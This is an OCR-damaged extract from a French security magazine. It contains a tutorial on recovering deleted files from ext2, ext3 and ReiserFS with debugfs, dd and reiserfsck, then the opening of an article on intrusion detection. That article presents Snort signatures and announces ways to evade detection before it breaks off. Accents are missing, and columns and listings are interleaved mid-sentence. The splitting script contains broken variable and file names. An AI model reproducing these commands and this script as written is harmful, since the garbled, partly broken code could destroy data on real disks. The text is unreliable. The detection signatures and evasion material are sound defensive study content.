Quand, par exemple la suite
d'une intrusion, vous avez
perdu des fichiers importants
sous Linux, vous ne devez pas
dsesprer. Il existe plusieurs
mthodes de rcupration des
donnes. Bien que souvent ce
soit trs fastidieux, les outils
appropris permettront de
rcuprer mme la totalit du
systme de fichiers endommag.
les donnes partir de diffrents types de sys-
tmes de fichiers.
Prparation de la partition
la rcupration des donnes
Indpendamment du systme de fichiers par-
tir duquel vous voulez rcuprer vos donnes,
il faut dmonter la partition sur laquelle vous
travaillerez. Pour tre au moins un petit peu sr
que les donnes n'ont pas t endommages,
il faut excuter cette tape juste aprs la sup-
pression des fichiers.
Cet article explique...
comment rcuprer les donnes partir des
systmes de fichiers de type ext2 et ext3,
comment sauver les fichiers de la partition Rei-
serFS.
Ce qu'il faut savoir...
l'utilisation de la ligne de commande sous
Linux,
les notions de base de la construction des sys-
tmes de fichiers.
hakin9 N o 4/2005
 Rcupration des donnes

Si, par contre, vous prfrez terminer

Notions lies l'espace disque les processus de faon standard,
il faut excuter :
inodes
L'inode est une structure de donnes utilise dans les systmes de fichiers linuxiens
# fuser -TERM -v -m /dev/hda10
pour dcrire les fichiers. L'inode se compose des lments suivants :

du type de fichier un fichier ordiniare, un rpertoire ou un fichier de priphri- La seconde mthode de dmontage
que, d'un systme systme de fichiers
de l'identifiant UID du propritaire, consiste le mettre en mode RO
de la liste de blocs disque et de leurs fragments constituant le fichier. (read only). Ainsi, vos fichiers ne
pourront pas tre remplacs. Pour
L'inode peut tre trait comme un identifiant du fichier sur le disque dur, utilis par le
ce faire, tapez la commande sui-
systme pour retrouver le fichier souhait. chaque fichier sur la partition donne,
vante :
un seul inode est affect.

Bloc de disque # mount -o ro, remount /dev/hda10

Le bloc de disque est une partie de l'espace sur la partition qui stocke les informa-
tions. La taille du bloc est dfinie par l'utilisateur lors du partitionnement du disque Attention : la commande ne fonc-
dur. Elle peut tre change l'aide des programmes modifiant le systme de fichiers
tionnera pas, si la partition est une
donn. Contrairement aux inodes, plusieurs blocs peuvent appartenir un fichier.
partition root directory, c'est--dire,
Journalisation elle constitue le systme de fichiers
La journalisation (en anglais journaling, enregistrement des modifications) est l'une principal. Si c'est le cas, il faut y infor-
des mthodes de stockage des donnes sur le disque dur. Le principe est trs sim- mer le programme mount, pour qu'il
ple, et en mme temps trs efficace. Le schma simplifi du fonctionnement est n'enregistre pas les changements
prsent sur la Figure 1. dans le fichier /etc/mtab. Pour cela,
Comme vous voyez, le Fichier1, aprs la modification, ne changera pas de
ajoutez l'option -n.
donnes contenues dans son emplacement primaire (contrairement aux systmes
de fichiers de fichiers sans journalisation), mais elles seront enregistres dans un Rcupration des
nouvel emplacement. C'est un grand avantage si vous constatez que la version
prcdente tait meilleure, vous tes capables de rcuprer l'ancienne version du donnes dans Ext2fs
fichier mme aprs les modifications importantes. Le premier type du systme de
fichiers dont nous nous occu-
perons est l'ext2fs. Nous allons
Pour dmonter une partition, L'option -m /dev/hda10 indique au commencer par trouver les inodes
il suffit de taper umount /dev/hdaX programme de vrifier quels services supprims.
(o X est le numro de la partition utilisent la partition hda10. Par contre
sur laquelle les donnes ont t sup- l'option -v (verbose) permet de ren- Recherche des inodes
primes, dans notre cas elle porte dre les donnes plus dtailles, et au supprims
le numro 10). Pourtant, si pen- lieu des numros PID, vous pourrez Pour effectuer ce pas, nous allons
dant cette opration, vous obtenez voir aussi les arguments nuls des utiliser le programme debugfs
le message suivant : programmes. Si vous constatez que issu du paquet e2fsprogs. Lanons
les processus sont inutiles, il suffit de l'application en ouvrant la partition
# umount /dev/hda10 les tuer au moyen de la commande : souhaite :
umount: /tmp: device is busy
# fuser -k -v -m /dev/hda10 # debugfs /dev/hda10
cela veut dire qu'un processus utilise
cette partition.
Dans ce cas, deux solutions se
prsentent. La premire consiste
tuer le processus utilisant la par-
tition donne. Mais il faut d'abord
vrifier quels processus bloquent la
partition en question. Pour ce faire,
vous pouvez utiliser le programme
fuser, servant identifier les utilisa-
teurs et les processus exploitant les
fichiers ou les sockets donns :

# fuser -v -m /dev/hda10 Figure 1. Le schma simplifi du fonctionnement de la journalisation

hakin9 N o 4/2005 www.hakin9.org 43

 Si l'invite s'affiche, il faut excuter
la commande lsdel qui nous mon-
trera tous les fichiers supprims
depuis la cration de cette partition
(en cas de systmes publiques,
cette liste peut contenir quelques
mille lignes, sa cration durera
donc un peu de temps). Maintenant
uniquement partir de la date de
suppression, l'UID de l'utilisateur
et la taille nous pouvons dduire
quels fichiers nous appartenaient
et lesquels nous voulons rcuprer.
Afficher les numros des inodes
est une trs bonne ide.
Consultons le rsultat de la
commande lsdel (cf. le Listing 1).
Les colonnes dans les rsultats de
la commande lsdel sont, respecti-
vement :
le numro d'inode (inode),
le propritaire (owner),
les options d'accs (mode),
la taille en octets (size),
le nombre de blocs occups
(blocks),
la date de suppression (time de-
leted).
Comme vous voyez, les numros
des inodes des fichiers supprims
sont 20 et 24. C'est justement ces
donnes que nous tenterons de r-
cuprer.
Vidage des donnes
Maintenant, nous pouvons essayer
de rcuprer l'inode 24 par le vidage
(en anglais dump) des donnes vers
un autre fichier. Comme cela est
prsent sur le Listing 1, il occupe
5 blocs. C'est une information trs
importante cette mthode peut
chouer pour les fichiers occupant
plus de 12 blocs. L'exemple de ce
type de rcupration est prsent
dans le Listing 2.
Pratique
Entre chevrons, on donne le
nom du fichier ou le numro de
l'inode. Le second paramtre est le
nom du fichier cible il faut l'entrer
avec le chemin d'accs complet, ce
qui veut dire que le raccourci ~/ ne
suffira pas.
Aprs l'excution de la com-
mande, il faut taper quit et lire le
44
Listing 1. L'effet de la commande lsdel du programme debugfs
debugfs: lsdel
Inode Owner Mode Size Blocks Time deleted
(...)
20 0 100644 41370 14/14 Tue Feb 15 19:13:25 2005
24 0 100644 17104 5/5 Tue Feb 15 19:13:26 2005
352 deleted inodes found.
debugfs:
Listing 2. Le vidage des donnes rcupres vers un fichier
debugfs: dump <24> /home/aqu3l/recovered.000
debugfs: quit
# cat /home/aqu3l/recovered.000
(...)
contenu du fichier rcupr. Sou- prsente sur le Listing 3 on peut
vent, la fin du fichier rcupr, noter que le bloc 22027 est un bloc
on peut trouver diffrents carac- indirect (IND).
tres-dchets ; ce sont les restes Ce qui nous intresse, c'est
des autres fichiers remplacs. On l'avant-dernire ligne qui affiche
peut les supprimer l'aide d'un les blocs appartenant l'inode
diteur de texte quelconque. Cette donn. Profitons du programme
mthode n'est efficace que dans le dd pour rcuprer les blocs de 0
cas de fichiers texte. ( partir de ce nombre on commen-
Il nous reste rcuprer le fi- ce toujours compter les blocs)
chier de l'inode 20 (cf. le Listing 1). jusqu' 11 :
Il occupe 14 blocs, et comme nous
l'avions dj dit, la mthode de # dd bs=4k if=/dev/hda10 \
vidage des donnes d'un inode skip=22015 count=12 \
occupant plus de 12 blocs ne sera > ~/recovered.001
pas efficace (cf. l'Encadr Blocs # dd bs=4k if=/dev/hda10 \
et leur hirarchie sous ext2fs). skip=22028 count=1 \
C'est pourquoi, pour rcuprer le >> ~/recovered.001
20 me inode, nous allons utiliser le
programme dd. Quelques mots d'explication :
Avant de rcuprer un fichier, v-
rifions les donnes de base, c'est-- bs signifie la taille du bloc (don-
dire les numros des blocs et la taille ne en kilooctets) que nous
du bloc sur la partition. Pour vrifier avons obtenu auparavant,
la taille d'un bloc, nous utiliserons la if signifie le fichier d'entre (en
commande : anglais input file),
skip indique au programme de
# dumpe2fs /dev/hda10 \ sauter 22015 blocs ayant la taille
| grep "Block size" bs dtermine,
count signifie le nombre de blocs
En rponse, nous devrons obtenir : cueillir.
dumpe2fs 1.35 (28-Feb-2004) Le bloc 22027 est doublement indi-
Block size: 4096 rect, alors nous l'avons omis et nous
avons cueilli directement le bloc
C'est justement ce dernier nombre 22028.
(4096) qui est la taille du bloc. Main-
tenant, quand nous connaissons Modification des inodes
la taille du bloc, vrifions les blocs Maintenant, nous allons nous oc-
rcuprer. Cette opration est cuper d'une autre faon de rcu-
www.hakin9.org hakin9 N o 4/2005
 Rcupration des donnes

Pour effectuer la modification, nous

Blocs et leur hirarchie sous ext2fs nous servirons aussi du program-
Les blocs du disque dur ne sont pas l'unique chane affecte un fichier (inode). Dans me debugfs, et le droulement de
certains endroits (dpendant du systme de fichiers et pas de l'utilisateur), il existe ce cette opration est prsent dans
qu'on appelle blocs indirects, de trois types : le Listing 4.
Comme vous voyez, seules
le bloc indirect (en anglais indirect block) IND,
deux inscriptions ont t modi-
le bloc doublement indirect (en anglais double indirect block) DIND,
fies : le temps de suppression
le bloc triplement indirect (en anglais triple indirect block) TIND.
(deletion time mais ce n'est pas
Chaque bloc numrot dpend du bloc suprieur, mais chaque bloc successif peut tout fait vrai car le systme n'est
stocker un plus grand nombre de blocs : pas capable de dterminer la date
de suppression d'un fichier) et le
les numros de 12 premiers blocs sont stocks directement dans un inode (ceux qui nombre de liens au fichier (link
sont le plus souvent appels blocs indirects),
count). Maintenant, aprs que le
un inode contient le numro d'un bloc indirect ; un bloc indirect contient les num-
programme debugfs ait termin son
ros de 256 blocs successifs avec les donnes,
fonctionnement, il suffit d'excuter
un inode contient le numro d'un bloc doublement indirect ; un bloc doublement
indirect contient les numros de 256 blocs indirects supplmentaires, la commande :
un inode contient le numro d'un bloc triplement indirect ; un bloc triplement indi-
rect contient les numros de 256 blocs doublement indirects supplmentaires. # e2fsck -f /dev/hda10

La structure est prsente sur la Figure 2. Le programme, aprs avoir rencon-

tr un inode modifi, constatera
que ce dernier n'est pas attach (en
prer les donnes la modification si celles-ci n'taient jamais sup- anglais unattached) et demandera
directe des inodes. Elle consiste primes et pendant la vrification si nous voulons lier les donnes
modifier un inode de faon ce suivante du disque dur, transfre le dcrites dans cet inode au dossier
que le systme de fichiers consid- fichier supprim vers le rpertoire lost+found. Si nous tenons ce fi-
re les donnes appropries comme lost+found sur la partition donne. chier, nous devons bien sr appuyer
sur la touche y. Mais il n'y a pas de
Listing 3. La vrification des blocs rcuprer roses sans pines aprs la con-
sultation du dossier, nous ne voyons
# debugfs /dev/hda10 pas les noms de fichiers, mais seule-
debugfs: stat <20>
ment les numros des inodes restau-
Inode: 20 Type: regular Mode: 0644 Flags: 0x0 Generation: 14863
User: 0 Group: 0 Size: 41370
rs (p. ex. 24). Il faut donc consulter
(...) les fichiers et suivant son contenu,
BLOCKS: reconnatre son nom original.
(0-11):22015-22026, (IND): 22027, (12):22028
TOTAL: 14
Ext3fs
La rcupration des donnes dans
ce systme de fichier est spcifi-
Listing 4. La rcupration des fichiers par la modification directe d'un que, parfois mme trs fastidieuse.
inode vrai dire, il n'existe aucune ma-
nire sre permettant de rcuprer
# debugfs -w /dev/hda10
les donnes de ce type de partition.
debugfs: mi <24>
Mode [0100644]
Mais il existe des mthodes plus au
User ID [0] moins officielles permettant de
Group ID [0] sauver nos donnes.
(...)
Deletion time [1108684119] 0
Est-ce l'ext3 ou l'ext2 ?
Link count [0] 1
(...)
L'ext3 et l'ext2 sont des systmes de
debugfs: quit fichiers trs similaires (except la
# e2fsck -f /dev/hda10 journalisation et la faon de suppri-
e2fsck 1.35 (28-Feb-2004) mer les fichiers) profitons donc de
(...)
ce fait pour rcuprer nos donnes.
Unattached inode 14
Connect to /lost+found<y>? yes
Nous essayerons d'utiliser debugfs ;
(...) ce processus est prsent dans le
Listing 5.

hakin9 N o 4/2005 www.hakin9.org 45


Figure 2. La structure des blocs dans le systme de fichiers ext2
Consultons le Listing 5. Nos ino-
des ont t supprims d'un systme
de fichiers. La dmarche que nous
avons choisie ne mne nulle part.
Pourtant, nous pouvons essayer
Pratique
une certaine astuce vrifier si le
systme d'exploitation considrait le
systme de fichier comme ext2. La
solution est divise en trois tapes :
dmonter le systme de fichiers,
le monter de nouveau, mais cette
fois-ci en tant qu'ext2,
rcuprer les fichiers.
46
Dmontons donc la partition :
Pour nous faciliter un peu la tche,
# umount /dev/hda10
Ensuite, nous devons la monter de
nouveau en tant qu'ext2, et cela en
mode read only pour les raisons de
scurit :
# mount -o ro -t ext2 \
/dev/hda10 /tmp
Maintenant, essayons de travailler
avec debugfs de la faon prsente /dev/hda10 ~/dsk.split
www.hakin9.org
l'occasion de la description du sys-
tme ext2. La recherche des inodes
supprims de la partition ext3 est
prsente sur le Listing 6.
L'inode 20 a une fausse date
de suppression. Cela est d au
fait qu'aprs la libration d'inode
par l'ext3, le systme ext2 peut
avoir des problmes de lecture des
donnes correctes concernant les
fichiers.
Aprs l'analyse dtaille de la
liste entire des fichiers supprims,
nous pouvons nous occuper de
la rcupration des donnes dont
nous avons besoin. Cette mthode
est identique celle utilise dans
le cas d'ext2, mais l'ext3 peut avoir
le problme aprs la modification
directe d'un inode. Dans certains
cas, cela peut mme conduire
la situation o la partition devient il-
lisible pour le systme d'exploitation.
Ce travail en vaut la peine
La seconde mthode de rcup-
ration des fichiers partir de l'ext2
est beaucoup plus difficile, mais elle
permet de rcuprer un plus grand
nombre de fichiers texte supprims.
Cette mthode aussi, quant elle,
a un dfaut grave elle exige la con-
sultation manuelle du contenu des
disques durs, il est donc trs difficile
de sauver les fichiers binaires.
Il est recommand d'effectuer
une copie de sauvegarde du disque
dur entier avant de commencer toute
opration. Pour ce faire, tapons la
commande :
$ dd if=/dev/hda10 \
>~/hda10.backup.img
nous pouvons diviser notre partition
en parties plus petites. Si la partition
a la taille de 1 Go, il est juste de la
partitionner en 10 parties de 100 Mo
chacune. Un simple script spciale-
ment conu cet effet est prsent
dans le Listing 7 le disque dur peut
tre partitionn l'aide de la com-
mande suivante :
$ dsksplitter.pl 10 1000000 \
hakin9 N o 4/2005
 Rcupration des donnes

Utilisons maintenant la commande

systme grep pour rechercher les Listing 5. La recherche des inodes supprims dans l'ext3fs
chanes de caractres qui nous int- # debugfs /dev/hda10
ressent (pour ce faire, nous pouvons debugfs: lsdel
videmment nous servir de la com- Inode Owner Mode Size Blocks Time deleted
mande strings) : 0 deleted inodes found.
debugfs: q

$ grep -n -a -1 \
"int main" ~/dsk.split/*
Listing 6. La rcupration des donnes de la partition ext3 monte en
L'option -n affichera le numro de la tant qu'ext2
ligne du fichier dans lequel se trouve debugfs: lsdel
la chane de caractres souhaite. Inode Owner Mode Size Blocks Time deleted
Grce l'option -a, les fichiers binai- (...)
res sont traits comme fichiers texte, 20 0 100644 41370 14/14 Tue Feb 14 19:20:25 2005
(...)
par contre -1 affichera une ligne
24 0 100644 17104 5/5 Tue Feb 15 19:13:26 2005
avant et une ligne aprs la chane 352 deleted inodes found.
retrouve. Bien sr, il est possible de debugfs:
changer la chane int main par une
chane de caractres quelconque.
Nous avons obtenu les rsultats : Listing 7. dsksplitter.pl un script simple servant partitionner les
disques durs
~/dsk.split/dsk.1:40210:
#include <sys/socket.h> #!/usr/bin/perl
if ($ARGV[3] eq "") {
~/dsk.split/dsk.1:40211:
print "Usage:\ndsksplitter.pl <dsk_parts> <part_size in Kb>
int main (int argc, char *argv[])
<partition_to_split> <target_dir>";
~/dsk.split/dsk.1:40212: }
{ (...) else
{
$parts = $ARGV[0];
L'Ext3 enregistre de nouveaux fi-
$size = $ARGV[1];
chiers au dbut du disque dur, nous $partition = $ARGV[2];
pouvons donc supposer que la ligne $tardir = $ARGV[3];
trouve est justement celle que nous for ($i = 1; $i <= $parts; $i++) {
cherchons. Essayons donc encore system "dd bs=1k if=$partition of=$tardir/dks.$i
count=$size skip=$ix$size";
une fois de partitionner le disque dur
}
et y rechercher les donnes :

$ mkdir ~/dsk1.split
$ dsksplitter.pl 10 10000 \ Le rsultat obtenu : Maintenant, nous avons le fichier
~/dsk.split/dsk.1 ~/dsk1.split contenant le programme supprim
~/dsk1.split/dsk.3:143: par un intrus. Bien que le fichier
Excutons maintenant la commande #include <sys/socket.h> dans lequel celui-ci se trouve a 10
grep sur le fichier dsk.1 partitionn : ~/dsk1.split/dsk.3:144: Mo, c'est mieux que d'effectuer la
int main (int argc, char *argv[]) recherche sur 1 Go de donnes.
$ grep -n -a -1 \ ~/dsk1.split/dsk.3:145: Pourtant, si cette prcision ne nous
"int main" ~/dsk1.split/* { (...) suffit pas, nous pouvons tenter de
diviser le fragment intressant du
disque dur en parties encore plus
Sur Internet petites. Si ce fichier sera rduit
une taille qui nous convient,
http://e2fsprogs.sourceforge.net le site du paquet e2fsprogs,
http://web.mit.edu/tytso/www/linux/ext2fs.html le site de l'ext2fs,
il nous reste de lancer un diteur de
http://www.namesys.com le site des auteurs du ReiserFS, texte quelconque et de supprimer
http://oss.software.ibm.com/developerworks/opensource/jfs le site du systme les lignes superflues.
de fichiers jfs, Cette technique prend beau-
http://oss.sgi.com/projects/xfs le site du projet xfs, coup de temps, mais elle est trs
http://www.securiteam.com/tools/6R00T0K06S.html le paquet unrm. efficace. Elle tait teste sur plu-
sieurs distributions de Linux, mais

hakin9 N o 4/2005 www.hakin9.org 47

 l'auteur ne peut pas garantir qu'elle
fonctionnera sur tous les systmes
Linux.
Rcupration sous
ReiserFS
Pour rcuprer les fichiers, nous
allons utiliser les programmes Linux
standard. Commenons par dd
il sera utilis pour crer l'image de la
partition. C'est ncessaire parce que
les oprations que nous excuterons
peuvent causer des dommages irr-
versibles. Excutons alors la com-
mande suivante :
$ dd bs=4k if=/dev/hda10 \
conv=noerror \
> ~/recovery/hda10.img
o /dev/hda10 est la partition rcu-
prer, et bs (block size) tait dfini
l'aide de la commande :
$ echo "Yes" | reiserfstune \
-f /dev/hda10 | grep "Blocksize"
Le paramtre conv=noerror entrane
la conversion au fichier sans erreurs,
ce qui signifie que mme si le pro-
gramme rencontre des erreurs sur
le disque dur, les donnes seront
converties au fichier. Aprs l'entre
de la commande, il faut attendre un
peu de temps, en fonction de la taille
de la partition.
Maintenant, il faut transfrer le
contenu de notre image de la parti-
tion vers le priphrique de boucle
de retour loop0 (il faut s'assurer que
celui-ci est libre) :
# losetup -d /dev/loop0
# losetup /dev/loop0 \
/home/aqu3l/recovery/hda10.img
Ensuite, il faut restaurer l'arbre
toute la partition sera vrifie,
Pratique
et les traces des inodes seront corri-
ges et restaures. Pour cela, nous
disposons de la commande :
# reiserfsck rebuild-tree -S \
-l /home/aqu3l/recovery/log /dev/loop0
Grce l'option -S, il sera possible
de vrifier le disque dur entier, et pas
48
seulement sa partie occupe. L'op-
tion -l avec le paramtre /home/user/
recovery/log permet d'enregistrer
le journal dans le rpertoire voulu.
Maintenant, nous crons le rper-
toire pour notre partition et nous la
montons :
# mkdir /mnt/recover; \
mount /dev/loop0 /mnt/recover
Les fichiers restaurs peuvent se
trouver dans l'un des trois em-
placements. Le premier est le
rpertoire original du fichier (on
traite /mnt/recover/ comme root
directory). Le deuxime est le rper-
toire lost+found dans notre dossier
principal temporaire (/mnt/recover).
Et le troisime est tout simplement le
rpertoire principal de la partition.
Il est presque sr que le fichier
recherch se trouve dans l'un de
ces trois emplacements. Si n'y est
pas, deux explications sont possi-
bles soit il tait le premier fichier
sur la partition et il a t remplac,
soit il tait transfr par erreur dans
un autre rpertoire. Dans le premier
cas, nous pouvons dire adieu nos
donnes, par contre dans le deuxi-
me cas, il est possible de le retrouver
dans un autre endroit l'aide de
l'outil find :
$ find /mnt/recover \
-name notre_fichier
Rcupration d'un fichier
dernirement modifi
Concentrons-nous maintenant la
rcupration d'un fichier dernire-
ment modifi. Cette mthode peut
tre aussi exploite pour les autres
fichiers anciens, mais une telle ten-
tative est base sur les calculs fasti-
dieux, sur une bonne connaissance
de notre propre systme et sur un
heureux hasard.
Comme cela est prsent sur
la Figure 1, dans les systmes de
fichiers avec journalisation, de nou-
veaux fichiers sont enregistrs au
dbut du disque dur. Thoriquement,
notre fichier se trouve juste aprs
ce qu'on appelle bloc principal (en
anglais root block), c'est--dire, le
www.hakin9.org
bloque de disque dfinissant l'en-
droit partir duquel les donnes
commencent.
Pour dfinir l'emplacement de
notre root block, il faut taper la com-
mande :
# debugreiserfs /dev/hda10 \
| grep "Root block"
En rponse, nous obtenons :
debugreiserfs 3.6.17 (2003 www.namesys)
Root block: 8221
Il est facile de deviner que 8221 est
le numro de notre bloc principal.
Nous devons aussi dterminer,
au moins approximativement, la taille
de notre fichier disons qu'il avait 10
Ko, alors la triple taille du bloc doit
tre suffisante. Si nous avons les
informations sur le fichier, nous pou-
vons excuter la commande :
# dd bs=4k if=/dev/hda10 \
skip=8221 count=3 \
> ~/recovered.003
Aprs la rcupration des donnes,
il faut vrifier leur validit avec le
fichier recherch :
# cat ~/recovered.003
De mme qu'en cas d'ext2fs, la fin
du fichier peut contenir diffrents
dchets il est trs facile de les
liminer.
Se faciliter la vie
Il existe des programmes qui per-
mettent d'automatiser les mthodes
de rcupration des donnes pr-
sentes dans cet article. La plupart
de ces types d'outils fonctionnent
sous le systme de fichiers ext2.
Je recommande le paquet unrm
et la bibliothque e2undel crite
par Olivier Diedrich fonctionnant
avec le paquet e2fsprogs. Bien sr,
vous ne devez pas vous attendre
rcuprer 100% de fichiers sup-
prims (bien que parfois cela soit
possible) si vous russissez
sauver environ 80%, on pourra
parler d'un grand succs. n
hakin9 N o 4/2005
 Les systmes de
dtection d'intrusion vus
de l'intrieur
Antonio Merola
U
n systme de dtection d'intrusion peut
tre compar une alarme domesti-
que contre les cambrioleurs si une
tentative d'intrusion malveillante est dcou-
verte, une rponse de quelque nature qu'elle
soit sera alors dclenche. Plus de capteurs
sont paramtrs, meilleur est le systme, puis-
que chaque capteur est charg de dtecter un
type particulier d'activit (telle que l'ouverture
des portes ou des fentres, une dtection vo-
lumtrique etc.). Toutefois, l'instar de tous les
autres systmes automatiques, un systme de
dtection d'intrusion peut prsenter des failles,
mettre de fausses alertes ou tre contourn
par des techniciens hautement qualifis sur ce
genre de matriel.
Le premier systme de dtection d'intrusion
a vu le jour au dbut des annes 80 ; il s'agissait
Science
d'un projet de recherche men par le gouver-
nement amricain et certaines organisations
militaires. La technologie mise au point a rapi-
dement volu en une dizaine d'annes et la
fin des annes 90, des solutions commerciales
sont apparues sur le march. Depuis lors, de
nombreux produits et ressources ont fait l'objet
de recherches et un nouveau poste informatique
a t ainsi cr analyste d'intrusion.
50 www.hakin9.org
L'objectif des systmes de
dtection d'intrusion consiste
identifier des attaques ou des
violations de scurit issues du
rseau de surveillance et des
activits hberges. Afin de bien
comprendre le fonctionnement
de tels systmes, il est ncessaire
de prsenter la technologie qui
rgit les systmes de dtection
d'intrusion.
C'est dans le domaine de l'audit que remonte
l'origine des systmes de dtection d'intrusion,
comme le relate l'ouvrage parfaitement docu-
ment intitul A Guide to Understanding Audit
in Trusted Systems (publi sous la collection
Rainbow Series du ministre de la Dfense
des tats-Unis), et galement connu sous
le titre de The Tan Book. Les auteurs de cet
ouvrage dfinissent l'audit comme un contrle
et une rvision indpendants des activits et des
Cet article explique...
la nature des systmes de dtection d'intrusion,
la faon de contourner les solutions proposes
par les systmes de dtection d'intrusion,
la faon de se protger contre les fuites de tels
systmes.
Ce qu'il faut savoir...
vous matrisez idalement les bases du proto-
cole HTTP,
vous devez connatre le fonctionnement de
base des protocoles TCP/IP,
vous tes cens savoir utiliser la couche sys-
tme UNIX et Windows.
hakin9 N o 4/2005

Systemes de dtection d'intrusion

labor l'Universit de Californie.

Ce systme tait capable de dtec-
ter des intrusions, et de prsenter
les corrlations existantes entre les
activits anormales et une mauvaise
utilisation de l'ordinateur.

Les solutions de
dtection d'intrusion
Il existe trois approches diffrentes
en matire de dtection d'intrusion.
La premire est le systme de dtec-
tion d'intrusion au niveau du rseau
ou Network Intrusion Detection Sys-
tem (NIDS), largement utilis, charg
d'analyser de manire passive le trafic
rseau, et de chercher les activits
malveillantes. La deuxime approche
est le systme de dtection d'intru-
sion au niveau des htes ou Host
Figure 1. Modle CIDF (Common Intrusion Detection Framework) d'un
Intrusion Detection System (HIDS),
systme de dtection d'intrusion au niveau du rseau
fonctionnant sur un hte surveill pour
enregistrements d'un systme. En r- caine. Dans sa publication scientifi- y dtecter des intrusions. Enfin, la troi-
gle gnrale, l'audit permet de remon- que, il a dcrit comment restreindre sime approche, et la moins utilise,
ter la source des vnements et de le champ des audits uniquement aux est le systme de dtection d'intrusion
dcouvrir des activits illgales. conditions de scurit pertinentes au niveau des nuds du rseau ou
James Anderson fut le premier et comment discerner les activits Network Node Intrusion Detection
dvelopper ces systmes de d- normales des illgales. Plus tard eut System (NNIDS) solution hybride
tection d'intrusion naissants pour lieu la dmonstration publique du regroupant les caractristiques des
le compte de l'arme de l'air amri- Network System Monitor, systme NIDS mentionns plus haut, tout en
n'analysant qu'une partie (ou nud)
du trafic rseau. Les approches de
Snort, fer de lance de la dtection d'intrusion dtection comprennent les tches
Snort est un outil libre dvelopp en 1998 par Martin Roesch de l'quipe Sourcefire. de contrle de l'activit du rseau en
Aujourd'hui, des entreprises, des universits, des agences gouvernementales etc. du
cherchant des modles particuliers
monde entier ont recours cet outil la documentation de Snort est disponible en plus
(ou signatures) afin de raliser une
de 10 langues. La version la plus rcente, sortie en mai 2005 est Snort 2.3.3, tlchar-
analyse statistique sur cette activit
geable partir du site http://www.snort.org.
Snort peut tre configur afin de fonctionner selon trois modes principaux : pour dterminer si les donnes ont
t modifies ou non. La Figure 1
mode sniffeur, permet de mieux comprendre le type
mode enregistreur de paquets de donnes, d'analyse ralise.
mode systme de dtection d'intrusion rseau. Par Common Intrusion Detec-
tion Framework (CIDF), on dsigne
Le dernier mode est de loin le plus complexe et le plus difficile configurer. Ce logiciel
l'ensemble des composants qui
est charg d'analyser le trafic rseau selon des rgles dfinies et de raliser certaines
actions (comme par exemple dclencher une alerte). La page consacre au manuel dfinissent un systme de dtec-
d'utilisation de Snort ainsi que les donnes de sortie de la commande snort -? contien- tion d'intrusion (l'objectif consiste
nent les informations ncessaires pour lancer l'outil en diffrents modes. Par exemple, crer un modle de conception pour
activer le mode systme de dtection d'intrusion rseau revient taper les lments ces systmes). Ces composants
suivants : comprennent la gnration d'vne-
ments, les modules d'analyse, les
# snort dev l ./log \
mcanismes de stockage et mme
h 10.10.10.0/24 c snort.conf
les contre-mesures. La plupart des
o le dernier fichier indiqu reprsente le nom de notre fichier de rgles. Chaque paquet systmes de dtection d'intrusion
de donnes sera ainsi contrl afin d'y trouver une rgle correspondante ; si tel est le se contentent de chercher des si-
cas, une action est alors dclenche. gnes d'attaques connues, appels
Quelques exemples de signatures sont exposs dans le Tableau 1. signatures, comme par exemple les
dfinitions antivirus. La principale

hakin9 N o 4/2005 www.hakin9.org 51

 Table 1. Exemple de signatures du logiciel Snort dclenche des alertes en cas de
Type de signature Chane dtection d'un trafic anormal.
Signature d'en-tte alert tcp any any -> $HOME _ NET any
Le logiciel de dtection d'intrusion le
(flag: SF; msg: SYN-FIN scan)
plus connu s'appelle Snort. Grce
Signature pattern alert udp $EXTERNAL _ NET any -> des prprocesseurs et des plug-
matching $HOME _ NET 53 (msg: DNS named ins activs, il est capable de traiter
version attempt; content:|07|version)
toutes les signatures except les
Signature base sur preprocessor: http _ decode 80
signatures de dtection d'anomalies
protocole (voir lEncadr intitul Snort, fer de
Signature base alert icmp any any -> $HOME _ NET any lance de la dtection d'intrusion).
d'heuristique (msg: Large ICMP packet; dsize > 800) Il est toutefois probable de
rencontrer certains problmes lis
diffrence rside dans les nombres ; chanes du contenu sur un seul paquet cette activit de dtection d'intru-
un systme de dtection d'intrusion de donnes ou sur un train de paquets sion. Le premier concerne les alertes
peut contrler approximativement de donnes (on parle de filtrage de un systme doit tre pralablement
200 000 signatures, contre seule- paquet de donnes avec tat). configur pour cet environnement
ment 15 000 signatures vrifies par Pour tre plus prcis, il existe spcifique afin de minimiser le plus
un systme d'antivirus classique. galement les lments suivants : possible le nombre de fausses alertes.
Comment les donnes sont-elles Il peut y avoir des fausses alertes po-
contrles ? Il existe des signatures les signatures bases sur proto- sitives ou ngatives. Une fausse alerte
d'en-tte moins prcises dans les- cole, dans lesquelles le systme positive survient lorsqu'un systme de
quelles les systmes de dtection de dtection d'intrusion filtre les dtection d'intrusion alerte l'utilisateur
d'intrusion cherchent des champs par- donnes pour contrler le bon d'activits suspicieuses, mais une
ticuliers contenus dans des en-ttes respect des spcifications RFC analyse approfondie prouve que le tra-
de paquets de donnes ils cherchent (Request For Comment) ; fic rseau est normal. Par contre, une
par exemple dans le paquet le port de les signatures base d'heuristi- fausse alerte ngative est dclenche
destination TCP 80 (on parle de filtra- que, dans lesquelles le systme de lorsqu'une activit non autorise est
ge de paquet de donnes sans tat). dtection d'intrusion filtre les don- dcouverte sans toutefois dclencher
Il existe galement des signatures pat- nes par valuation statistique ; d'alerte. La Figure 2 illustre une impl-
tern matching plus labores. Dans ce les signatures de dtection mentation classique d'un systme de
cas, le systme de dtection d'intru- d'anomalies, dans lesquelles le dtection d'intrusion rseau.
sion cherche une correspondance aux systme de dtection d'intrusion
Contournement de la
dtection d'intrusion
Les solutions qu'offrent les systmes
de dtection d'intrusion sont trs
pratiques et permettent d'liminer

propos de l'auteur
Antonio Merola travaille en tant qu'ex-
pert confirm de la scurit chez
Telecom Italia. Au cours de sa car-
rire professionnelle, il a t confront
de nombreux aspects de la scurit.
Son statut d'indpendant lui permet
de prodiguer ses services plusieurs
socits en tant que consultant et ins-
Science

tructeur sur un large choix de thmes

relatifs la scurit. Il publie galement
des articles sur l'informatique dans de
nombreux magazines italiens. Parmi
ces centres d'intrts rcents, on peut
citer les pots de miel ainsi que les so-
lutions de scurit proposes par les
systmes de dtection et de prvention
contre les intrusions.
Figure 2. Systme de dtection d'intrusion rseau

52 www.hakin9.org hakin9 N o 4/2005


Systemes de dtection d'intrusion

commande /../ afin de retourner vers

Bogue du Microsoft Indexing Server le rpertoire parent pour y excuter
Un des exemples les plus spectaculaires de vulnrabilit mentionnes plus haut est le les scripts cibles. On appelle cette
bogue qui a affect (et affecte encore) l'Indexing Server version 2.0 de Microsoft Win- technique l'attaque par violation de
